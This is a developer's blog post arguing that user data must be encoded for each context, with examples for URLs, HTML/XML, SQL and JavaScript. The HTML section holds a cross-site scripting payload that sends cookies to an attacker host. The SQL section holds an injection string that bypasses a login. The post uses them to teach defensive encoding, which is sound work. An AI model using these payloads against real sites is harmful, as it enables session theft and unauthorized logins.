I seem to run into this at every job I’ve had, so perhaps it’s time to drop some knowledge on a more global scale. It seems that many people don’t realize that when they put data (especially when provided by users) into different contexts, that data almost always needs to be encoded. There are very few exceptions. The consequences of not doing so range from improperly formed data (XML) to downright nasty security vulnerabilities (HTML and SQL). Here are just a few instances of places where you need to ensure that data is properly encoded.
URLs
As someone working on web services, this encoding issue comes up more often than most. URLs are delicate things. There are rules governing URLs that most people don’t seem to grasp. Chief among them is that you must URL encode everything that goes into a URL. This is most prevalent in the query string. If your data contains characters such as “&”, “?” or “=”…you’re screwed if you let that through. Imagine if you wanted to set the query parameter “foo” to “bar&baz=jimmy”. If you dump that in raw, you get the following:
?foo=bar&baz=jimmy
Instead of a single “foo” parameter, you’ve ended up with a “foo” and a “baz” parameter. Even worse, the “foo” parameter is set to “bar” which isn’t what was intended. URL encoding the parameter first gives you what you were looking for the first time around:
?foo=bar%26baz%3Djimmy
Bear in mind, it isn’t enough to URL encode just the value. The parameter name must be URL encoded as well.
HTML and XML
HTML and XML have similar issues (for the most part), so I’m lumping them together here. This is one of the more commonly understood encoding issues around because almost everybody has thrown an unencoded “< ” into their HTML/XML at some point. The result, if you’re lucky, is a useful error message from your browser/XML parser telling you where that little bastard is. If you’re unlucky, it turns into a silent failure or it monkeys with the content in a way that is subtle and difficult to detect.
In the worst cases, you inline HTML/XML content into actual HTML/XML, making it impossible for a parser to tell that anything is wrong. Imagine, in both cases, that you have some plain text content to include in your file that looks like this:
<div>foo!</div>
The parsers will simply treat that content as another DOM node. If you’re fortunate, your XML specifies some form of schema that would indicate the document is invalid…but I wouldn’t count on it.
The example I just gave is pretty benign and unlikely to cause you any serious harm. But in HTML there are far worse dangers possible. Imagine if you were to inadvertently inline the following content:
<script>document.write(”<img src=’http://attacker.com/capturecookies.php?cookies=’ + escape(document.cookie) + “/>”);</script>
I think I did that right, but even if I didn’t, you get the idea. That content must be HTML encoded (or XML encoded) in order to diffuse what may be a devastating cross site scripting attack (sending your authentication cookies to a foreign domain). Alternatively, if you’re expecting HTML content, you need to scrub it…but that’s another topic. The point is, if you’re putting plain text into HTML or XML…encode it.
SQL
SQL injection attacks are one of the oldest attacks around. Imagine you have a login form that takes a username and a password. Behind the scenes you have the following SQL code:
execute_sql(”select * from users where username=’$username’ and password=’$password’);
What happens when I type in a username of “ryan” and a password of “‘ or password like ‘%”? Let’s do the substitution:
execute_sql(”select * from users where username=’ryan’ and password=” or password like ‘%’);
I may not have that SQL exactly right, but (again) you get the gist of what’s happening. If you allow this, you’ve just made it possible for someone to log in as any user without having the password. This actually happened at a company I used to work at. Fortunately we discovered the exploit internally. The solution is to SQL encode the parameters. There are usually different ways of doing this. I’ve seen some libraries that provide methods to encode strings for you. In most cases, however, database libraries provide prepared statements that will accomplish the same thing.
JavaScript
The reason I decided to write this was seeing Gopal’s post dealing with encoding strings in JavaScript. Gopal highlights an XSS caused by not escaping a forward slash. He goes on to mention that JSON encoders may escape them, but don’t necessarily do so. The issue here is that JavaScript inside of HTML is not JSON. While JSON may escape the forward slash, JavaScript must escape the forward slash. In this case, JSON encoding is the wrong solution to the problem. It’s close, but not quite the right answer. It would be like using an HTML encoder to encode XML. While it may work in certain cases and it’s very close to the right answer, it’s still wrong. Use the right encoder for the context. If you’re encoding data in XML, use an XML encoder. If you’re encoding data in JavaScript, use a JavaScript encoder.